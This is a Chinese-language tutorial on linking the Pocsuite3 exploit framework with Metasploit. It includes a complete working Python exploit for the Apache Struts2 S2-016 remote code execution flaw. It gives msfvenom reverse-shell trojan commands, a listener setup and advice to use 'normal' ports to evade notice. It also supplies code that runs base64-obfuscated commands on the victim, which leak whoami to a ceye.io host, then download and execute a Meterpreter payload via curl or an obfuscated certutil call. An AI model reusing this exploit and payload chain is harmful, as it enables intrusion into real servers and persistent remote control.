Pocsuite3联动MSF


Pocsuite3联动MSF

? Pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架,采用 Python3 编写,支持验证,利用 及 shell 三种插件模式,你可以指定单个目标或者从文件导入多个目标,使用单个 PoC 或者 PoC 集合进行漏洞的验证或利用。可以使用命令行模式进行调用,也支持类似 Metaspolit 的交互模式进行处理,除此之外,还包含了一些基本的如输出结果报告等功能。

? Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。

? 为了更好的实现shell管理以及后渗透,便有了将Pocsuite3的shell直接反弹到Meterpreter的想法。

使用msfvenom生成木马

Windows 
Msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 

Linux 
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 
(端口请最好设置为80,443等"正常"端口)

msf开启监听

msfconsole 
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
set LHOST 192.168.88.128 
set LPORT 8080(443等"正常"端口)
set ExitOnSession false 
exploit

在pocsuite3中放置木马,我这里放在cly.py下的新建msf文件夹

函数加载

导入包
import base64
import threading
import random

将这两个函数直接复制到编写的poc中

木马下载的http服务

    def _httpserver(self):
        os.system("cd msf && python3 -m http.server 666")

Meterpreter的反弹函数

    def _msf(self):
        #ceye验证目标os
        osSys = "linux" 
        random_uri=str(random.randint(10000, 99999))
        ceye = "curl http://我是马赛克.ceye.io/`whoami`/%s"%random_uri
        base64ceye = str(base64.b64encode(ceye.encode("utf-8")), "utf-8")
        cmdceye ="bash -c {echo,%s}|{base64,-d}|{bash,-i}"%base64ceye
        self._exploit(cmdceye)
        flag =  "whoami`/%s"%random_uri
        resp1 = requests.get('http://api.ceye.io/v1/records?token=我是马赛克&type=request')
        time.sleep(10)

        if flag in resp1.text:
            osSys = "win"
            print("目标为windows系统")           
        else:
            print("目标为linux系统")
        #开启http服务    
        ip = input("木马下载ip:")
        port = input("木马下载port:")
        t1 = threading.Thread(target=self._httpserver)
        t1.start()
        #反弹Meterpreter
        if  osSys == "linux":

            cmds = {"curl -o /tmp/index.html http://"+ip+":"+port+"/linux_x64.elf","chmod +x /tmp/index.html","/tmp/index.html"}
            for i in range(3):
                for msf in cmds:
                    base64msf = str(base64.b64encode(msf.encode("utf-8")), "utf-8")
                    cmd ="bash -c {echo,%s}|{base64,-d}|{bash,-i}"%base64msf
                    res=self._exploit(cmd)
        else:
            cmds = {"certutil.exe%CommonProgramFiles:~10,1%-urlcache%CommonProgramFiles:~10,1%-split%CommonProgramFiles:~10,1%-f%CommonProgramFiles:~10,1%http://"+ip+":"+port+"/windows_x64.exe","windows_x64.exe"}
            for i in range(3):
                for msf in cmds:
                    res=self._exploit(msf)
注( ceye token请换成自己的)

在你的attack模块的payload中添加

if cmd(你的--command) == "msf":
self._msf()
return self._verify()(这里没有回显,直接用verify判断)

注意一定发包时要写try-except
(有的命令执行后直接中断,不给res包)

使用时直接 --attack --command msf 即可

*注意:当payload位置比较特殊或需要其他编码时,请灵活调整

效果


#(以s2-016举例)
from inspect import Parameter
import re
from typing import final
import urllib.parse
import time
from collections import OrderedDict
import base64
import threading
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptDict, VUL_TYPE
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import OptString
import unittest
import warnings
import random
import requests
from urllib3.exceptions import InsecureRequestWarning
import os





class DemoPOC(POCBase):
    vulID = '1'
    vulnerability = 'S2-016'  
    version = '1.0'
    author = 'kwjqsj'
    vulDate = ''
    grade = 'high'
    appPower = 'apache' 
    appName = 'Apache struts2'
    appVersion = 'Struts 2.0.0-2.3.15'
    name = 'demo_s2-016'
    vulType = 'RCE' 
    vulclassification = 'Web'
    createDate = '2022-1-7'
    updateDate = '2022-1-7'
    desc = ''''''
    appPowerLink = 'https://struts.apache.org/'
    samples = ['vulhub']
    pocDesc = '''  
    eg: python3 .\cli.py -r exp.py -u http://192.168.131.138:8080 --verify
        python3 .\cli.py -r exp.py -u http://192.168.131.138:8080 --shell
        python3 .\cli.py -r exp.py -u http://192.168.131.138:8080 --attack --command id
         '''





    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'}

    def _httpserver(self):
        os.system("cd msf && python3 -m http.server 666")
    

    def _msf(self):
        #ceye验证目标os
        osSys = "linux" 
        random_uri=str(random.randint(10000, 99999))
        ceye = "curl http://我是马赛克.ceye.io/`whoami`/%s"%random_uri
        base64ceye = str(base64.b64encode(ceye.encode("utf-8")), "utf-8")
        cmdceye ="bash -c {echo,%s}|{base64,-d}|{bash,-i}"%base64ceye
        self._exploit(cmdceye)
        flag =  "whoami`/%s"%random_uri
        resp1 = requests.get('http://api.ceye.io/v1/records?token=我是马赛克&type=request')
        time.sleep(10)

        if flag in resp1.text:
            osSys = "win"
            print("目标为windows系统")           
        else:
            print("目标为linux系统")
        #开启http服务    
        ip = input("木马下载ip:")
        port = input("木马下载port:")
        t1 = threading.Thread(target=self._httpserver)
        t1.start()
        #反弹Meterpreter
        if  osSys == "linux":

            cmds = {"curl -o /tmp/index.html http://"+ip+":"+port+"/linux_x64.elf","chmod +x /tmp/index.html","/tmp/index.html"}
            for i in range(3):
                for msf in cmds:
                    base64msf = str(base64.b64encode(msf.encode("utf-8")), "utf-8")
                    cmd ="bash -c {echo,%s}|{base64,-d}|{bash,-i}"%base64msf
                    res=self._exploit(cmd)
        else:
            cmds = {"certutil.exe%CommonProgramFiles:~10,1%-urlcache%CommonProgramFiles:~10,1%-split%CommonProgramFiles:~10,1%-f%CommonProgramFiles:~10,1%http://"+ip+":"+port+"/windows_x64.exe","windows_x64.exe"}
            for i in range(3):
                for msf in cmds:
                    res=self._exploit(msf)

       
        
    def _url(self,url):
        result = urllib.parse.urlparse(url)
        finalUrl = ""
        if result.scheme == "http":
            finalUrl = 'http://' + result.netloc + "/"
        else:
            finalUrl = 'https://' + result.netloc + "/" 
        return finalUrl       


    def _exploit(self,cmd="whoami"):
        url = self._url(self.url)
        
        if cmd == "msf":
            self._msf()
            return self._verify()
        
        cmd = urllib.parse.quote(cmd)         
        payload = 'index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27'+cmd+'%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D'
        print(payload)
        get_url = url  + payload
        try:
            page = requests.post(url=get_url, headers=self.headers,timeout=5)
            return page.text
        except Exception as e:
            pass

    def _check(self):
        url = self._url(self.url)
        payload = 'index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22echo test%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D'
        post_url = url  + payload

        s = requests.post(url=post_url, headers=self.headers)
        if 'test' in s.text:
            print("存在s2-016漏洞")
            return True
        else:
            return False

    def _shell(self):
        pass
                

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o
    
    def _verify(self):
        
        result = {}
        p = self._check()
        if p:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)
         
    def _attack(self):
        result = {}
        cmd = self.get_option("command")
        result = dict()           
        result['Stdout'] = self._exploit(cmd)      
        return self.parse_output(result)
 

            
            

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)


相关